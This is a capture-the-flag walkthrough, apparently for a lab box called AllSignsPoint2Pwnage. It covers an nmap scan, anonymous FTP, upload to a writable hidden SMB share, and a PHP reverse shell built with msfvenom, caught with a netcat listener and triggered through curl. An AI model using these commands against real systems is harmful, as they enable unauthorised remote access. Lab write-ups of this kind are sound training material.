AllSignsPoint2Pwnage (WIP)
Nmap
sudo nmap 10.10.54.102 -p- -sS -sV -Pn
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5040/tcp open unknown
5900/tcp open vnc VNC (protocol 3.8)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
First up checking FTP shows we can login with anonymous login. From here listing the contents only shows notice.txt.

Viewing the contents we become aware of a hidden SMB share called 'images'. The notice also implies uploading is possible on the share.

Checking for shares with smbclient.
smbclient -U '' -L \\\\10.10.54.102\\

We can then connect to the images$ share. List the contents and confirmd file upload with the put
command using test.txt

Browsing to port 80 to check out the webserver we are presented with a slideshow. Using the contextual menu to save the images shows us the name of the image which matches that in the SMB share.

We can test if we can read the contents of test.txt to confirm we can execute uploaded files. We can try the /images/ directory as we known the share exists.
curl http://10.10.54.102/images/test.txt

Knowing this works we can start to work towards getting a reverse shell. Checking information regarding the web server using Nikto shows it is powered by PHP.

Ideally we should create a PHP reverse shell and upload it to the SMB share. We can achieve this with msfvenom as shown below.
msfvenom -p php/reverse_php LHOST=10.14.3.108 LPORT=80 -f raw > phpreverseshell.php
Then upload the shell to the SMB share.

Open a netcat
listener to the port specified in the payload.
sudo nc -lvp 80
Then execute the shell with curl.
curl http://10.10.54.102/images/phpreverseshell.php
Which connects our listener.

Last updated